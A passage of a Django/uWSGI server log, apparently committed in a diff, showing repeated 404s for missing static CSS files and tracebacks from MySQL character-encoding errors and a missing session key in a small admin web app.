switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 565/685] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 566/686] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 567/687] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 568/688] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 569/689] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /announcement/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x81\\xAD\\xE5\\x96\\x9C...' for column 'a_title' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 477, in announcement + models.Announcement.objects.create(a_title=a_title, a_content=a_content) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x81\\xAD\\xE5\\x96\\x9C...' for column 'a_title' at row 1") +[pid: 2069|app: 0|req: 569/690] 219.228.146.253 () {48 vars in 1031 bytes} [Thu Jan 14 07:58:15 2021] POST /announcement/ => generated 211445 bytes in 185 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 570/691] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 571/692] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:15 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 572/693] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:15 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 573/694] 219.228.146.253 () {40 vars in 933 bytes} [Thu Jan 14 07:58:22 2021] GET /admin-home/ => generated 6515 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 574/695] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 575/696] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 576/697] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 577/698] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 578/699] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 579/700] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 580/701] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 581/702] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:22 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 582/703] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:22 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 583/704] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:26 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 584/705] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:26 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 585/706] 219.228.146.253 () {40 vars in 937 bytes} [Thu Jan 14 07:58:27 2021] GET /announcement/ => generated 7421 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 586/707] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 587/708] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 588/709] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 589/710] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 590/711] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:27 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 591/712] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 592/713] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 593/714] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 594/715] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:27 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 595/716] 219.228.146.253 () {40 vars in 934 bytes} [Thu Jan 14 07:58:27 2021] GET /kind-manage/ => generated 6423 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 596/717] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 597/718] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 598/719] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 599/720] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 600/721] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 601/722] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 602/723] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:28 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 603/724] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:28 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 604/725] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:28 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 605/726] 219.228.146.253 () {40 vars in 935 bytes} [Thu Jan 14 07:58:34 2021] GET /announcement/ => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 606/727] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 607/728] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 608/729] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 609/730] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 610/731] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 611/732] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 612/733] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:34 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 613/734] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:34 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 614/735] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 615/736] 219.228.146.253 () {40 vars in 934 bytes} [Thu Jan 14 07:58:36 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 616/737] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 617/738] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 618/739] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 619/740] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 620/741] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 621/742] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 622/743] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 623/744] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:36 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 624/745] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:36 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 625/746] 219.228.146.253 () {38 vars in 861 bytes} [Thu Jan 14 07:58:44 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 2069|app: 0|req: 626/747] 219.228.146.253 () {38 vars in 863 bytes} [Thu Jan 14 07:58:44 2021] GET /home/ => generated 58497 bytes in 60 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +Not Found: /all +[pid: 2069|app: 0|req: 627/748] 219.228.146.253 () {38 vars in 859 bytes} [Thu Jan 14 07:58:53 2021] GET /all => generated 3456 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 628/749] 219.228.146.253 () {38 vars in 865 bytes} [Thu Jan 14 07:59:00 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File 